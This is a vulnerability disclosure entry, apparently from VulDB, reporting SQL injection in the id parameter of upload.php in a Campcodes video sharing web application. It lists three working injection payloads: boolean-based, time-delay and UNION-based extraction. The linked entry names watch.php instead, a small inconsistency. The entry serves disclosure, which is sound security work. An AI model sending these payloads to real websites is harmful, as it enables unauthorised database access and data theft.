| 제목 | SQL injection vulnerability exists in Video Sharing Website |
|---|
| 설명 | SQL injection vulnerability exists in id parameter of upload.php file of Video Sharing Website
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
Payload:
description=555&id=-1' AND 6272=(SELECT (CASE WHEN (6272=6272) THEN 6272 ELSE (SELECT 5051 UNION SELECT 1735) END))-- -&img=&title=555&vid=
or
description=555&id=-1' AND (SELECT 2944 FROM (SELECT(SLEEP(5)))uAsY) AND 'KkdQ'='KkdQ&img=&title=555&vid=
or
description=555&id=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b787071,0x686a696f7244735446516f67695962684569544943716462697051646671796f704e594e57544a43,0x7176706b71),NULL,NULL,NULL,NULL,NULL-- -&img=&title=555&vid= |
|---|
| 원천 | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/Video%20Sharing%20Website/Video%20Sharing%20Website%20vuln%201.pdf |
|---|
| 사용자 | SSL_Seven_Security Lab_WangZhiQiang_ZhangYing (UID 41874) |
|---|
| 제출 | 2023. 04. 14. AM 06:08 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 04. 14. AM 08:21 (2 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 225915 [Campcodes Video Sharing Website 1.0 watch.php code SQL 주입] |
|---|
| 포인트들 | 20 |
|---|